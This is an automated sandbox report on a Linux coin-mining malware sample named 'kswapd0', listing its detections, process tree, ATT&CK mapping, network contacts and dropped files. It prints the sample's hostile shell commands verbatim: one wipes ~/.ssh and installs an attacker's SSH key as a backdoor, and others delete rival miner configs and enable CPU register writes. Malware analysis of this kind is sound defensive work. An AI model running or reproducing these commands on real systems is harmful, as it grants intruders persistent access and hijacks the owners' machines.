Edit tour

Linux Analysis Report
kswapd0

Overview

General Information

Sample Name:	kswapd0
Analysis ID:	1312722
MD5:	92ebbacccf23ef998d99635a2b670e43
SHA1:	55af994c3d877c68d35df2873d2b88f58c22e11d
SHA256:	56edefa58b141d1c8dc88b235629b0cce6e47d61a21b0bc24289dd9cc9227fa2
Infos:

Detection

Score:	80
Range:	0 - 100
Whitelisted:	false

Signatures

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Writes to CPU model specific registers (MSR) (e.g. miners improve performance by disabling HW prefetcher)

Stdout / stderr contain strings indicative of a mining client

Sample is packed with UPX

Tries to load the MSR kernel module used for reading/writing to CPUs model specific register

Machine Learning detection for sample

Sample reads /proc/mounts (often used for finding a writable filesystem)

Sample contains only a LOAD segment without any section mappings

Reads CPU information from /sys indicative of miner or evasive malware

Yara signature match

Executes the "mkdir" command used to create folders

Reads system information from the proc file system

Uses the "uname" system call to query kernel version information (possible evasion)

Executes the "chmod" command used to modify permissions

Removes protection from files

ELF contains segments with high entropy indicating compressed/encrypted content

Creates hidden files and/or directories

Executes the "modprobe" command used for loading kernel modules

Sample tries to set the executable flag

Executes commands using a shell command-line interpreter

Reads CPU information from /proc indicative of miner or evasive malware

Executes the "rm" command used to delete files or directories

Classification

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1312722
Start date and time:	2023-09-22 05:39:08 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Analysis Mode:	default
Sample file name:	kswapd0
Detection:	MAL
Classification:	mal80.troj.evad.mine.lin@0/4@0/0

Runtime Messages

Command:	/tmp/kswapd0
PID:	4697
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:	chattr: No such file or directory while trying to stat /home/james/.xmrig.json sh: 1: lockr: not found chattr: No such file or directory while trying to stat /home/james/.config/xmrig.json sh: 1: lockr: not found

Process Tree

system is lnxubuntu1

kswapd0 (PID: 4697, Parent: 4629, MD5: 92ebbacccf23ef998d99635a2b670e43) Arguments: /tmp/kswapd0

kswapd0 New Fork (PID: 4706, Parent: 4697)

sh (PID: 4706, Parent: 4697, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"

sh New Fork (PID: 4707, Parent: 4706)

rm (PID: 4707, Parent: 4706, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf .ssh

sh New Fork (PID: 4708, Parent: 4706)

mkdir (PID: 4708, Parent: 4706, MD5: a97f666f21c85ec62ea47d022263ef41) Arguments: mkdir .ssh

sh New Fork (PID: 4723, Parent: 4706)

chmod (PID: 4723, Parent: 4706, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod -R go= /home/james/.ssh

kswapd0 New Fork (PID: 4731, Parent: 4697)

sh (PID: 4731, Parent: 4697, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "chattr -ia ~/.xmrig.json;lockr -ia ~/.xmrig.json; rm -rf ~/.xmrig.json; chattr -ia ~/.config/xmrig.json; lockr -ia ~/.config/xmrig.json; rm -rf ~/.config/xmrig.json"

sh New Fork (PID: 4736, Parent: 4731)

chattr (PID: 4736, Parent: 4731, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -ia /home/james/.xmrig.json

sh New Fork (PID: 4747, Parent: 4731)

rm (PID: 4747, Parent: 4731, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /home/james/.xmrig.json

sh New Fork (PID: 4750, Parent: 4731)

chattr (PID: 4750, Parent: 4731, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -ia /home/james/.config/xmrig.json

sh New Fork (PID: 4761, Parent: 4731)

rm (PID: 4761, Parent: 4731, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /home/james/.config/xmrig.json

kswapd0 New Fork (PID: 4770, Parent: 4697)

kswapd0 New Fork (PID: 4776, Parent: 4770)

sh (PID: 4776, Parent: 4770, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "/sbin/modprobe msr allow_writes=on > /dev/null 2>&1"

sh New Fork (PID: 4777, Parent: 4776)

modprobe (PID: 4777, Parent: 4776, MD5: 45c119a51c0bd3f057393c8ac51d00be) Arguments: /sbin/modprobe msr allow_writes=on

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
4697.1.0000000000401000.000000000082f000.r-x.sdmp	Linux_Trojan_Pornoasset_927f314f	unknown	unknown	0x17f0d8:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48

Joe Sandbox Signatures

• AV Detection
• Bitcoin Miner
• Networking
• System Summary
• Data Obfuscation
• Persistence and Installation Behavior
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Lowering of HIPS / PFW / Operating System Security Settings

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: kswapd0

ReversingLabs: Detection: 18%

Machine Learning detection for sample

Source: kswapd0

Joe Sandbox ML: detected

Bitcoin Miner

Writes to CPU model specific registers (MSR) (e.g. miners improve performance by disabling HW prefetcher)

Source: /tmp/kswapd0 (PID: 4770)

MSR open for writing: /dev/cpu/0/msr

Jump to behavior

Stdout / stderr contain strings indicative of a mining client

Source: /tmp/kswapd0

Stderr: xmrig

Tries to load the MSR kernel module used for reading/writing to CPUs model specific register

Source: /bin/sh (PID: 4777)

Modprobe: /sbin/modprobe -> /sbin/modprobe msr allow_writes=on

Jump to behavior

Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/thread_siblings	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_id	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_siblings	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/physical_package_id	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/level	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/type	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/size	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/level	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/type	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/level	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/type	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/size	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/number_of_sets	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/level	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/type	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/size	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/possible	Jump to behavior

Source: /tmp/kswapd0 (PID: 4697)

Reads CPU info from proc file: /proc/cpuinfo

Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.139.82
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.139.82
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.139.82
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.139.82
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.139.82
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.139.82
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.139.82
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.139.82
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.139.82
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.139.82
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.139.82
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.139.82
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.139.82
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.139.82
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.139.82
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.139.82
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.139.82
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.139.82

Source: kswapd0

String found in binary or memory: http://upx.sf.net

System Summary

Malicious sample detected (through community Yara rule)

Source: 4697.1.0000000000401000.000000000082f000.r-x.sdmp, type: MEMORY

Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown

Source: LOAD without section mappings

Program segment: 0x400000

Source: 4697.1.0000000000401000.000000000082f000.r-x.sdmp, type: MEMORY

Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16

Source: classification engine

Classification label: mal80.troj.evad.mine.lin@0/4@0/0

Data Obfuscation

Sample is packed with UPX

Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Id: UPX 3.96 Copyright (C) 1996-2020 the UPX Team. All Rights Reserved. $

Persistence and Installation Behavior

Sample reads /proc/mounts (often used for finding a writable filesystem)

Source: /tmp/kswapd0 (PID: 4697)

File: /proc/4697/mounts

Jump to behavior

Source: /bin/sh (PID: 4708)

Mkdir executable: /bin/mkdir -> mkdir .ssh

Jump to behavior

Source: /tmp/kswapd0 (PID: 4697)	Reads from proc file: /proc/cpuinfo	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads from proc file: /proc/meminfo	Jump to behavior
Source: /tmp/kswapd0 (PID: 4770)	Reads from proc file: /proc/meminfo	Jump to behavior

Source: /bin/sh (PID: 4723)

Chmod executable: /bin/chmod -> chmod -R go= /home/james/.ssh

Jump to behavior

Source: /bin/mkdir (PID: 4708)

Directory: .ssh

Jump to behavior

Source: /bin/chmod (PID: 4723)

File: /home/james/.ssh (bits: - usr: - grp: - all: rwx)

Jump to behavior

Source: /tmp/kswapd0 (PID: 4706)	Shell command executed: sh -c "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"	Jump to behavior
Source: /tmp/kswapd0 (PID: 4731)	Shell command executed: sh -c "chattr -ia ~/.xmrig.json;lockr -ia ~/.xmrig.json; rm -rf ~/.xmrig.json; chattr -ia ~/.config/xmrig.json; lockr -ia ~/.config/xmrig.json; rm -rf ~/.config/xmrig.json"	Jump to behavior
Source: /tmp/kswapd0 (PID: 4776)	Shell command executed: sh -c "/sbin/modprobe msr allow_writes=on > /dev/null 2>&1"	Jump to behavior

Source: /bin/sh (PID: 4707)	Rm executable: /bin/rm -> rm -rf .ssh	Jump to behavior
Source: /bin/sh (PID: 4747)	Rm executable: /bin/rm -> rm -rf /home/james/.xmrig.json	Jump to behavior
Source: /bin/sh (PID: 4761)	Rm executable: /bin/rm -> rm -rf /home/james/.config/xmrig.json	Jump to behavior

Source: submitted sample

Stderr: chattr: No such file or directory while trying to stat /home/james/.xmrig.jsonsh: 1: lockr: not foundchattr: No such file or directory while trying to stat /home/james/.config/xmrig.jsonsh: 1: lockr: not found: exit code = 0

Source: kswapd0

Submission file: segment LOAD with 7.9462 entropy (max. 8.0)

Source: /bin/sh (PID: 4777)

Modprobe: /sbin/modprobe -> /sbin/modprobe msr allow_writes=on

Jump to behavior

Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/thread_siblings	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_id	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_siblings	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/physical_package_id	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/level	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/type	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/size	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/level	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/type	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/level	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/type	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/size	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/number_of_sets	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/level	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/type	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/size	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition	Jump to behavior
Source: /tmp/kswapd0 (PID: 4697)	Reads CPU info from /sys: /sys/devices/system/cpu/possible	Jump to behavior

Source: /tmp/kswapd0 (PID: 4697)	Queries kernel information via 'uname':			Jump to behavior
Source: /sbin/modprobe (PID: 4777)	Queries kernel information via 'uname':			Jump to behavior

Source: /tmp/kswapd0 (PID: 4697)

Reads CPU info from proc file: /proc/cpuinfo

Jump to behavior

Source: /bin/sh (PID: 4736)	Args: chattr -ia /home/james/.xmrig.json			Jump to behavior
Source: /bin/sh (PID: 4750)	Args: chattr -ia /home/james/.config/xmrig.json			Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Scripting	1 Kernel Modules and Extensions	1 Kernel Modules and Extensions	3 File and Directory Permissions Modification	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Data Obfuscation	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Scripting	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Hidden Files and Directories	Security Account Manager	23 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	11 Obfuscated Files or Information	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
kswapd0	19%	ReversingLabs	Linux.Coinminer.BitCoinMiner
kswapd0	100%	Joe Sandbox ML

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	kswapd0	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
179.43.139.82	unknown	Panama		51852	PLI-ASCH	false

Process:	/bin/sh
File Type:	OpenSSH RSA public key
Category:	dropped
Size (bytes):	389
Entropy (8bit):	5.91239652812259
Encrypted:	false
SSDEEP:	12:4c1kSs8+BGm8/zAbN+Ms57FTPEGXMnouG:RuDRO/ERnsrPEI8q
MD5:	A420F7A60A40F3FF3A806A01FEB1DFDA
SHA1:	1AE65132B036DE51BCC62F66B51AE362E11182AF
SHA-256:	A8460F446BE540410004B1A8DB4083773FA46F7FE76FA84219C93DAA1669F8F2
SHA-512:	1BA854C321D89441291DA2638D65748FFA06923A63FD2BB9BE8A66440236503FB34E375726A8DA679B55CED51DDA82293FFCFB8BB76563E2DA0071222D3247BF
Malicious:	false
Reputation:	low
Preview:	ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr.

/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages

Download File

Process:	/tmp/kswapd0
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	3
Entropy (8bit):	1.584962500721156
Encrypted:	false
SSDEEP:	3:Odn:Od
MD5:	76DC611D6EBAAFC66CC0879C71B5DB5C
SHA1:	B4182BFF4B3CF75F9E54F4990F9BD153C0C2973C
SHA-256:	2747B7C718564BA5F066F0523B03E17F6A496B06851333D2D59AB6D863225848
SHA-512:	E2BC8CA53E630757EF4A3E8F3D0FC48AAC10A66DBE6D14D759D00C21263F4C0623F6841DC3995081F97EFF9641EA9BE42C9219F66E6C5B9EA9EFFA1C8450C3FB
Malicious:	false
Reputation:	low
Preview:	128

/tmp/cert.pem

Download File

Process:	/tmp/kswapd0
File Type:	PEM certificate
Category:	dropped
Size (bytes):	964
Entropy (8bit):	5.9723721306121975
Encrypted:	false
SSDEEP:	24:LrcFXM+/mXYI4W6Q1JbDX1HaJGkff+fn0hoRa4UlgNsNCGbU66KLJ:LrcRWpLV6cEGPHZUKNo1
MD5:	97164748DA3F82C5D74A0948140AAF97
SHA1:	A8E703F26AB2403C34AD53E02C215EB846995C9F
SHA-256:	3B57AF761EDCB31C8D95E857F4FF9E94BC6D7415CFDEA4CAC77D427B07BA5D30
SHA-512:	1437A43E91DAFD4F3A09F2EC98534689E35848E88605227A8810E76EB0C102468E401E3116758965E0975BF3F08384CF5E98F0BD5D1EB0CFDDB38AAC15EEA793
Malicious:	false
Reputation:	low
Preview:	-----BEGIN CERTIFICATE-----.MIICnDCCAYQCAQEwDQYJKoZIhvcNAQELBQAwFDESMBAGA1UEAwwJbG9jYWxob3N0.MB4XDTIzMDkyMjAzMzk0M1oXDTMzMDkxOTAzMzk0M1owFDESMBAGA1UEAwwJbG9j.YWxob3N0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA/MccPfB70G+k.zVTbPXCpms0I87SWfrpPvxOFz04tHnFsMd2uSDq2hJlG4bqJtTXNVB3DlKyz5NQw.lwYl7HbR4YpASGcUYx66QBHA+NF2bim/WV1cEvvZ52fHFhFu375mBYbg356JK5dT.7nd21Qa5iOp9FxJjNbTbqjXftGKGUy2P5q/M/axjxBG3CnQ4YTuORHSnt+6w8Uwv.HrfqOKW9YXsD/P7PPwSvwS0FzX8KLlkrgN7NhK4ZHpvPOroyVCXfrP1sWM3IlKYZ.wvbvayyJH+czmYgF3Xb8a2FNZqlXuUAI2/roojDZKZIyHVBSfGOcO36RdD1pE5Vq.qmdttkBt0wIDAQABMA0GCSqGSIb3DQEBCwUAA4IBAQDtF5VpiwRSpVUsBsOSgje5.fqlridwDDx7ZCk4Qom684Cmpowj6UnFRP3EwyBL7O/TTzEguaewHdrS+FeiRfinB.aQK0e5No5Xcb/VeGfE3BHHu9R30Z0EJ9c166S9Eft6RBTex+MG0FcM83YZgHCHWa.A4q2gYm2bi/yrrjfgb202v7Lfk5as1ys6NJLPRLSHl3/Iamr2sXRMPDcBOrN+isI.Kfm/wuWn0iK0kcCongK9ejXsP1su8RWpMDvU3aTKZjUQwdWngiaIbItrredUq1OR.0SQLnvFtM5O+f3nd+I3tEMp0c2Yhn/dwK9CSSQ2hmR5WvVz5jaL9pl5Dkcwp1039.-----END CERTIFICATE-----.

/tmp/cert_key.pem

Download File

Process:	/tmp/kswapd0
File Type:	ASCII text
Category:	dropped
Size (bytes):	1704
Entropy (8bit):	6.022324673206885
Encrypted:	false
SSDEEP:	48:Lrjv1aRgZIt/nz5k3GIvxhBliwmQ+0paswfFFXSH:Lrr9Z0zK3GIvx8wM0KfzX2
MD5:	66A44D121393393383280491BEF76956
SHA1:	4299A3D437E23DFAAC80309CC7D145665363C06A
SHA-256:	A4BEA9837A94392E28B8F6E355D5119E3E1C243A1BDAF2A06CBE6B7300C017BE
SHA-512:	837299BF3912A190CE3BA04CFAD6C452D67F891C1E928447705A5562128B50BF6A7FD9572A610B3E704F849E02AACAC09E243492CFC0B87F713ADA94187B84AF
Malicious:	false
Reputation:	low
